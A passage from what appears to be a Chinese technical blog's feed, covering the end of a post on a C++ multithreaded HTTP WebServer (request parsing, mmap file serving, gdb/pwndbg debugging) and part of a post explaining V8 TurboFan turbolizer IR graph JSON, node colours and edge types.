&lt;&lt; endl;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 1. 先解析第一行</span></span><br><span class="line">        <span class="keyword">if</span>((err_ty = <span class="built_in">parseURI</span>()) != ERR_SUCCESS)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">if</span>(err_ty == ERR_NOT_IMPLEMENTED)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;Request method is not implemented.&quot;</span> &lt;&lt; endl;</span><br><span class="line">                <span class="built_in">handleError</span>(<span class="string">&quot;501&quot;</span>, <span class="string">&quot;Not Implemented&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span> <span class="keyword">if</span>(err_ty == ERR_HTTP_VERSION_NOT_SUPPORTED)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;Request HTTP Version Not Supported.&quot;</span> &lt;&lt; endl;</span><br><span class="line">                <span class="built_in">handleError</span>(<span class="string">&quot;505&quot;</span>, <span class="string">&quot;HTTP Version Not Supported&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span> <span class="keyword">if</span>(err_ty == ERR_BAD_REQUEST)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;Bad Request.&quot;</span> &lt;&lt; endl;</span><br><span class="line">                <span class="built_in">handleError</span>(<span class="string">&quot;400&quot;</span>, <span class="string">&quot;Bad Request&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">                <span class="built_in">assert</span>(<span class="number">0</span> &amp;&amp; <span class="string">&quot;UNREACHABLE&quot;</span>); </span><br><span class="line">            <span class="keyword">continue</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 2. 解析每一条http header</span></span><br><span class="line">        <span class="keyword">if</span>((err_ty = <span class="built_in">parseHttpHeader</span>()) != ERR_SUCCESS)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">if</span>(err_ty == ERR_BAD_REQUEST)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;Bad Request.&quot;</span> &lt;&lt; endl;</span><br><span class="line">                <span class="built_in">handleError</span>(<span class="string">&quot;400&quot;</span>, <span class="string">&quot;Bad Request&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">                <span class="built_in">assert</span>(<span class="number">0</span> &amp;&amp; <span class="string">&quot;UNREACHABLE&quot;</span>); </span><br><span class="line">            <span class="keyword">continue</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 3. 输出剩余的 HTTP body</span></span><br><span class="line">        <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;HTTP Body: &#123;&quot;</span> </span><br><span class="line">                &lt;&lt; <span class="built_in">escapeStr</span>(request_.<span class="built_in">substr</span>(pos_, request_.<span class="built_in">length</span>() - pos_)) </span><br><span class="line">                &lt;&lt; <span class="string">&quot;&#125;&quot;</span> &lt;&lt; endl;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 发送目标数据 ------------------------------------------</span></span><br><span class="line"></span><br><span class="line">        <span class="comment">// 试图打开一个文件</span></span><br><span class="line">        <span class="type">int</span> file_fd;</span><br><span class="line">        <span class="keyword">if</span>((file_fd = <span class="built_in">open</span>(path_.<span class="built_in">c_str</span>(), O_RDONLY, <span class="number">0</span>)) == <span class="number">-1</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// 如果打开失败,则返回404</span></span><br><span class="line">            <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;File [&quot;</span> &lt;&lt; path_ &lt;&lt; <span class="string">&quot;] open failed ! &quot;</span> &lt;&lt; <span class="built_in">strerror</span>(errno) &lt;&lt; endl;</span><br><span class="line">            <span class="built_in">handleError</span>(<span class="string">&quot;404&quot;</span>, <span class="string">&quot;Not Found&quot;</span>); </span><br><span class="line">            <span class="keyword">continue</span>;</span><br><span class="line">        &#125;  </span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// 获取目标文件的大小</span></span><br><span class="line">            <span class="keyword">struct</span> stat st;</span><br><span class="line">            <span class="keyword">if</span>(<span class="built_in">stat</span>(path_.<span class="built_in">c_str</span>(), &amp;st) == <span class="number">-1</span>)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;Can not get file [&quot;</span> &lt;&lt; path_ &lt;&lt; <span class="string">&quot;] state ! &quot;</span> &lt;&lt; endl;</span><br><span class="line">                <span class="built_in">handleError</span>(<span class="string">&quot;500&quot;</span>, <span class="string">&quot;Internal Server Error&quot;</span>);</span><br><span class="line">                <span class="keyword">continue</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// 读取文件, 使用 mmap 来高速读取文件</span></span><br><span class="line">            <span class="type">void</span>* addr = <span class="built_in">mmap</span>(<span class="literal">nullptr</span>, st.st_size, PROT_READ, MAP_PRIVATE, file_fd, <span class="number">0</span>);</span><br><span class="line">            <span class="comment">// 记得关闭文件描述符</span></span><br><span class="line">            <span class="built_in">close</span>(file_fd); </span><br><span class="line">            <span class="comment">// 异常处理</span></span><br><span class="line">            <span class="keyword">if</span>(addr == MAP_FAILED)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;Can not map file [&quot;</span> &lt;&lt; path_ &lt;&lt; <span class="string">&quot;] -&gt; mem ! &quot;</span> &lt;&lt; endl;</span><br><span class="line">                <span class="built_in">handleError</span>(<span class="string">&quot;500&quot;</span>, <span class="string">&quot;Internal Server Error&quot;</span>);</span><br><span class="line">                <span class="keyword">continue</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// 将数据从内存页存入至 responseBody</span></span><br><span class="line">            <span class="type">char</span>* file_data_ptr = <span class="built_in">static_cast</span>&lt;<span class="type">char</span>*&gt;(addr);</span><br><span class="line">            <span class="function">string <span class="title">responseBody</span><span class="params">(file_data_ptr, file_data_ptr + st.st_size)</span></span>;</span><br><span class="line">            <span class="comment">// 记得删除内存</span></span><br><span class="line">            <span class="type">int</span> res = <span class="built_in">munmap</span>(addr, st.st_size);</span><br><span class="line">            <span class="keyword">if</span>(res == <span class="number">-1</span>)</span><br><span class="line">                <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;Can not unmap file [&quot;</span> &lt;&lt; path_ &lt;&lt; <span class="string">&quot;] &lt;-&gt; mem ! &quot;</span> &lt;&lt; endl;</span><br><span class="line">            <span class="comment">// 获取 Content-type</span></span><br><span class="line">            string suffix = path_;</span><br><span class="line">            <span class="comment">// 通过循环找到最后一个 dot</span></span><br><span class="line">            <span class="type">size_t</span> dot_pos;</span><br><span class="line">            <span class="keyword">while</span>((dot_pos = suffix.<span class="built_in">find</span>(<span class="string">&#x27;.&#x27;</span>)) != string::npos)</span><br><span class="line">                suffix = suffix.<span class="built_in">substr</span>(dot_pos + <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 发送数据</span></span><br><span class="line">            <span class="keyword">if</span>(<span class="built_in">sendResponse</span>(<span class="string">&quot;200&quot;</span>, <span class="string">&quot;OK&quot;</span>, MimeType::<span class="built_in">getMineType</span>(suffix), responseBody) != ERR_SUCCESS)</span><br><span class="line">                <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;Send Response failed !&quot;</span> &lt;&lt; endl;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;------------------ Connection Closed ------------------&quot;</span> &lt;&lt; endl;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h2 id="六、编译-调试">六、编译 &amp; 调试</h2><p>最后简单说说编译和调试。使用<code>make</code>命令即可构建带有调试信息的 WebServer 二进制文件。这里的makefile是直接抄自 <a href="https://github.com/linyacool/WebServer/blob/master/old_version/old_version_0.1/Makefile">linyacool/WebServer 中的 makefile</a>，并在其基础之上，修改了编译优化选项为 <code>-O0</code>，以及设置编译时附带额外的调试信息<code>-g3 -ggdb3</code>。</p><p><code>-g</code>所携带的调试信息可以被多个调试器所共用，而<code>-ggdb</code>所携带的调试信息是专供 gdb 使用，两者不完全等同。<code>-ggdb3</code>的调试等级甚至可以调试<strong>宏</strong>。</p><p>这里的调试主要是使用 <strong>gdb + pwndbg</strong> 来完成（gdb 永远的神）。因为多线程程序在gdb下调试非常的方便，它可以很快的切换线程上下文（使用<code>info &lt;threadNum&gt;</code>）以及栈帧上下文（使用<code>f &lt;frameNum&gt;</code>）；而且临时查看 <code>errno</code> 以及临时调用 <code>strerror(errno)</code>查看错误信息等等都非常地方便。</p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;概述&quot;&gt;概述&lt;/h2&gt;
&lt;p&gt;WebServer 1.0 简单实现了一个基础的 &lt;strong&gt;多并发网络服务程序&lt;/strong&gt; 。在该版本中，主要实现了以下重要内容：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;线程互斥锁 &amp;amp; 条件变量的封装&lt;/li&gt;
&lt;li&gt;线程池的设计，以支持并发&lt;/li&gt;
&lt;li&gt;基础网络连接的实现&lt;/li&gt;
&lt;li&gt;http 协议的简略支持
&lt;ul&gt;
&lt;li&gt;支持部分常用 HTTP 报文
&lt;ul&gt;
&lt;li&gt;200 OK&lt;/li&gt;
&lt;li&gt;400 Bad Request&lt;/li&gt;
&lt;li&gt;500 Internal Server Error&lt;/li&gt;
&lt;li&gt;501 Not Implemented&lt;/li&gt;
&lt;li&gt;505 HTTP Version Not Supported&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;支持 HTTP GET 请求&lt;/li&gt;
&lt;li&gt;支持 HTTP/1.1 &lt;strong&gt;持续连接&lt;/strong&gt; 特性&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;1.0 版本的项目代码位于 &lt;a href=&quot;https://github.com/Kiprey/WebServer/tree/4095ccc6fd3facd3988ea71178cacad7b4e0dd13&quot;&gt;Kiprey/WebServer CommitID: 4095cc - github&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;最新版本的项目代码位于 &lt;a href=&quot;https://github.com/Kiprey/WebServer&quot;&gt;Kiprey/WebServer - github&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    <category term="Project" scheme="https://kiprey.github.io/categories/Project/"/>
    
    <category term="WebServer" scheme="https://kiprey.github.io/categories/Project/WebServer/"/>
    
    
    <category term="WebServer" scheme="https://kiprey.github.io/tags/WebServer/"/>
    
  </entry>
  
  <entry>
    <title>V8 TurboFan 生成图简析</title>
    <link href="https://kiprey.github.io/2021/04/v8TurboFan_IR_intro/"/>
    <id>https://kiprey.github.io/2021/04/v8TurboFan_IR_intro/</id>
    <published>2021-04-29T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.208Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>v8 turbolizer 有助于我们分析 JIT turbofan 的优化方式以及优化过程。但我们常常对于 turbolizer 生成的 IR 图一知半解，不清楚具体符号所代表的意思。以下为笔者阅读相关代码后所做的笔记。</p><span id="more"></span><h2 id="二、TurboFan-Json-格式">二、TurboFan Json 格式</h2><ul><li><p><code>--trace-turbo</code> 参数将会生成一个 JSON 格式的数据。通过在 turbolizer 上加载该 JSON，可以得到一个这样的IR图：<br><img src="/2021/04/v8TurboFan_IR_intro/image-20210429213824538.png" alt="img"></p></li><li><p>其中，该 JSON 的格式如下：</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;function&quot;</span><span class="punctuation">:</span> <span class="string">&quot;opt_me&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;sourcePosition&quot;</span><span class="punctuation">:</span> <span class="number">109</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;source&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span>js source<span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;phases&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">        <span class="punctuation">&#123;</span></span><br><span class="line">            <span class="attr">&quot;name&quot;</span><span class="punctuation">:</span> <span class="string">&quot;Typed&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;graph&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;data&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">                <span class="attr">&quot;nodes&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">                    <span class="punctuation">[</span>...<span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">                    <span class="punctuation">&#123;</span></span><br><span class="line">                        <span class="attr">&quot;id&quot;</span><span class="punctuation">:</span> <span class="number">20</span><span class="punctuation">,</span></span><br><span class="line">                        <span class="attr">&quot;label&quot;</span><span class="punctuation">:</span> <span class="string">&quot;FrameState[INTERPRETED_FRAME, 11, Ignore, 0x1a5acd4aa5e9 &lt;SharedFunctionInfo opt_me&gt;]&quot;</span><span class="punctuation">,</span></span><br><span class="line">                        <span class="attr">&quot;title&quot;</span><span class="punctuation">:</span> <span class="string">&quot;FrameState[INTERPRETED_FRAME, 11, Ignore, 0x1a5acd4aa5e9 &lt;SharedFunctionInfo opt_me&gt;]&quot;</span><span class="punctuation">,</span></span><br><span class="line">                        <span class="attr">&quot;live&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span></span><br><span class="line">                        <span class="attr">&quot;properties&quot;</span><span class="punctuation">:</span> <span class="string">&quot;Idempotent, NoRead, NoWrite, NoThrow, NoDeopt&quot;</span><span class="punctuation">,</span></span><br><span class="line">                        <span class="attr">&quot;pos&quot;</span><span class="punctuation">:</span> <span class="number">178</span><span class="punctuation">,</span></span><br><span class="line">                        <span class="attr">&quot;opcode&quot;</span><span class="punctuation">:</span> <span class="string">&quot;FrameState&quot;</span><span class="punctuation">,</span></span><br><span class="line">                        <span class="attr">&quot;control&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line">                        <span class="attr">&quot;opinfo&quot;</span><span class="punctuation">:</span> <span class="string">&quot;5 v 0 eff 0 ctrl in, 1 v 0 eff 0 ctrl out&quot;</span><span class="punctuation">,</span></span><br><span class="line">                        <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;Internal&quot;</span></span><br><span class="line">                    <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">                    <span class="punctuation">[</span>...<span class="punctuation">]</span></span><br><span class="line">                <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">                <span class="attr">&quot;edges&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">                    <span class="punctuation">&#123;</span></span><br><span class="line">                        <span class="attr">&quot;source&quot;</span><span class="punctuation">:</span> <span class="number">100</span><span class="punctuation">,</span></span><br><span class="line">                        <span class="attr">&quot;target&quot;</span><span class="punctuation">:</span> <span class="number">101</span><span class="punctuation">,</span></span><br><span class="line">                        <span class="attr">&quot;index&quot;</span><span class="punctuation">:</span> <span class="number">0</span><span class="punctuation">,</span></span><br><span class="line">                        <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;control&quot;</span></span><br><span class="line">                    <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">                    <span class="punctuation">[</span>...<span class="punctuation">]</span></span><br><span class="line">                <span class="punctuation">]</span></span><br><span class="line">            <span class="punctuation">&#125;</span></span><br><span class="line">        <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="punctuation">[</span>...<span class="punctuation">]</span></span><br><span class="line">    <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;nodePositions&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">        <span class="punctuation">[</span>...<span class="punctuation">]</span></span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>简单的概括一下，就是：</p><ul><li>function： 函数名称</li><li>sourcePosition：代码的起始位置。</li><li>source： 当前 turboFan 优化的 JS 代码</li><li>phases： turboFan 的各个优化阶段<ul><li>优化阶段1<ul><li>name： 当前优化阶段的名称</li><li>type：显示的形式，是 <code>graph</code> IR 图还是 文本。</li><li>data： 当前阶段真正存放的结点与边的数据。<ul><li>nodes： 结点数据<ul><li><p>结点1</p><ul><li><p>id: 结点ID，通常是一个数字</p></li><li><p>label：结点标签</p></li><li><p>title：结点主题</p></li><li><p>live： 当前结点是否是活结点，为 true / false</p></li><li><p>properties：当前结点的属性</p></li><li><p>pos：暂且不说</p></li><li><p>opcode：当前结点的操作码，例如<code>End</code></p></li><li><p>control：当前是否是控制结点，为 true / false</p></li><li><p>opinfo：具体的结点信息，通常表示当前结点的<strong>ValueInputCount、EffectInputCount、ControlInputCount、ValueOutputCount、EffectOutputCount、ControlOutputCount</strong>。</p><blockquote><p>表示方式如下：</p><p>“&lt;ValueInputCount&gt;     v<br>&lt;EffectInputCount&gt;    eff<br>&lt;ControlInputCount&gt;   ctrl in,<br>&lt;ValueOutputCount&gt;    v<br>&lt;EffectOutputCount&gt;   eff<br>&lt;ControlOutputCount&gt;  ctrl out”</p><p>例如：“0 v 1 eff 1 ctrl in, 0 v 1 eff 0 ctrl out”</p></blockquote></li></ul></li><li><p>[其他结点]</p></li></ul></li><li>edges：边的数据<ul><li>边1<ul><li>source：边的源节点 ID</li><li>target：边的目标节点ID</li><li>index：当前边连接到目标节点的哪个输入</li><li>type：当前边的类型，例如 control、value、effect等等</li></ul></li><li>[其他边]</li></ul></li></ul></li></ul></li><li>[其他优化阶段]</li></ul></li><li>nodePositions：每个结点在 JS 源码中所对应的代码位置</li></ul></li></ul><h2 id="三、Node">三、Node</h2><h3 id="a-属性说明">a. 属性说明</h3><p>以下是截取出的一个 Node 示例：</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;id&quot;</span><span class="punctuation">:</span> <span class="number">128</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;label&quot;</span><span class="punctuation">:</span> <span class="string">&quot;LoadField[+16]&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;title&quot;</span><span class="punctuation">:</span> <span class="string">&quot;LoadField[tagged base, 16, Internal, kRepTaggedPointer|kTypeAny, PointerWriteBarrier]&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;live&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;properties&quot;</span><span class="punctuation">:</span> <span class="string">&quot;NoWrite, NoThrow, NoDeopt&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;pos&quot;</span><span class="punctuation">:</span> <span class="number">388</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;opcode&quot;</span><span class="punctuation">:</span> <span class="string">&quot;LoadField&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;control&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;opinfo&quot;</span><span class="punctuation">:</span> <span class="string">&quot;1 v 1 eff 1 ctrl in, 1 v 1 eff 0 ctrl out&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;Internal&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>对应的结点如下：</p><p><img src="/2021/04/v8TurboFan_IR_intro/image-20210429223708339.png" alt="img"></p><p>一一对应以下便可以看出，其中的 id、label、title、properties、opinfo 以及 type 均显现在图中。</p><p>而 live、pos、opcode 以及 control 字段则是给 turbolizer.js 使用的。</p><blockquote><p>注意到上图中的 “Inplace update in phase: Typed”，其中的 phase 则是 turbolizer.js 动态分析出的，不在 JSON 中记录。</p></blockquote><h3 id="b-颜色">b. 颜色</h3><p>我们可以注意到，IR图中的结点都有颜色，其中颜色貌似符合某种规律。</p><p>通过查阅 turbolizer.js 以及 在线 turbolizer 的 css 代码，turbolizer 将结点分为了以下几种结点，并设置了不同的颜色加以区分：</p><ul><li><p>Control 结点：对于那些控制结点， 即 JSON 数据中 control 字段为 true 的结点，其颜色为<strong>黄色</strong>。</p><p><img src="/2021/04/v8TurboFan_IR_intro/image-20210430000215129.png" alt="img"></p></li><li><p>Input 结点：那些 opcode 为 Parameter 或 Constant 结点，其颜色为<strong>浅蓝色</strong>。</p><p><strong><img src="/2021/04/v8TurboFan_IR_intro/image-20210430000451537.png" alt="img"></strong></p></li><li><p>Live 结点（<strong>这其实不能算一类结点</strong>）：即 live 字段为 true 的结点。其反向结点——DeadNode——的颜色会在原先颜色的基础上进行浅色化处理，例如以下图片。图片中的两个结点其类型相同，所不同的是左边的结点是 Dead，右边结点是 Live。</p><p><img src="/2021/04/v8TurboFan_IR_intro/image-20210430001053708.png" alt="img"></p></li><li><p>JavaScript结点：那些 opcode 以 <strong>JS</strong> 开头的结点，其颜色为<strong>橙红色</strong>。</p><p><img src="/2021/04/v8TurboFan_IR_intro/image-20210430001231982.png" alt="img"></p></li><li><p>Simplified 结点：那些 opcode 包含 <strong>Phi、Boolean、Number、String、Change、Object、Reference、Any、ToNumber、AnyToBoolean、Load、Store</strong>，但<strong>不是 JavaScript类型</strong>的结点。其颜色如下所示：</p><p><img src="/2021/04/v8TurboFan_IR_intro/image-20210430001623787.png" alt="img"></p></li><li><p>Machine 结点：除了上述四种结点以外，剩余的结点。颜色如下所示：</p><p><img src="/2021/04/v8TurboFan_IR_intro/image-20210430001755202.png" alt="img"></p></li></ul><h2 id="四、Edge">四、Edge</h2><p>Edge 中的 Type 共有五种，分别是 <strong>value</strong>、<strong>context</strong>、<strong>frame-state</strong>、<strong>effect</strong>、<strong>control</strong> 以及最后一个 unknown。</p><p>以下是这些边的一些例子：</p><h3 id="a-value-边">a. value 边</h3><p>对于该边：</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;source&quot;</span><span class="punctuation">:</span> <span class="number">80</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;target&quot;</span><span class="punctuation">:</span> <span class="number">83</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;index&quot;</span><span class="punctuation">:</span> <span class="number">4</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;value&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>其边的视觉效果如下：</p><p><img src="/2021/04/v8TurboFan_IR_intro/image-20210429230418329.png" alt="img"></p><p>可以看到，对于 <strong>Value 边</strong>来说，是一条<strong>实线</strong>。</p><h3 id="b-context-边">b. context 边</h3><p>对于该边：</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;source&quot;</span><span class="punctuation">:</span> <span class="number">4</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;target&quot;</span><span class="punctuation">:</span> <span class="number">49</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;index&quot;</span><span class="punctuation">:</span> <span class="number">3</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;context&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>视觉效果如下：</p><p><img src="/2021/04/v8TurboFan_IR_intro/image-20210429231008606.png" alt="img"></p><p>可以看到，<strong>Context边</strong>也是一条<strong>实线</strong>。但在当前这个例子中，由于 Context 边只会由 <code>Parameter[%context#4]</code>结点发出，因此<strong>不会与 Value 边混淆</strong>。</p><p>这里需要注意一下，Context 边只会存在于某个 Context 结点发出的所有边，即不会出现结点既发出 Context 边又发出 Value 边的情况。</p><blockquote><p>如果有还请指正。</p></blockquote><h3 id="c-frame-state-边">c. frame-state 边</h3><p>例子：</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;source&quot;</span><span class="punctuation">:</span> <span class="number">50</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;target&quot;</span><span class="punctuation">:</span> <span class="number">49</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;index&quot;</span><span class="punctuation">:</span> <span class="number">4</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;frame-state&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>视觉效果：</p><p><img src="/2021/04/v8TurboFan_IR_intro/image-20210429232323942.png" alt="img"></p><p>可以看到，对于一条 <strong>frame-state 边</strong>，其视觉效果是一条 <strong>疏虚线</strong>。</p><p>frame-state 边一定是由一个 FrameState 结点发出的。</p><blockquote><p>上图的另一条虚线是<strong>密虚线</strong>，所不同的是虚线的<strong>疏密程度</strong>。</p></blockquote><h3 id="d-effect-边">d. effect 边</h3><p>例子：</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;source&quot;</span><span class="punctuation">:</span> <span class="number">114</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;target&quot;</span><span class="punctuation">:</span> <span class="number">49</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;index&quot;</span><span class="punctuation">:</span> <span class="number">5</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;effect&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>视觉效果：</p><p><img src="/2021/04/v8TurboFan_IR_intro/image-20210429232831969.png" alt="img"></p><p>即 <strong>effect 边</strong>的显示效果是 <strong>密虚线</strong>。</p><h3 id="e-control-边">e. control 边</h3><p>例子：</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;source&quot;</span><span class="punctuation">:</span> <span class="number">31</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;target&quot;</span><span class="punctuation">:</span> <span class="number">49</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;index&quot;</span><span class="punctuation">:</span> <span class="number">6</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span 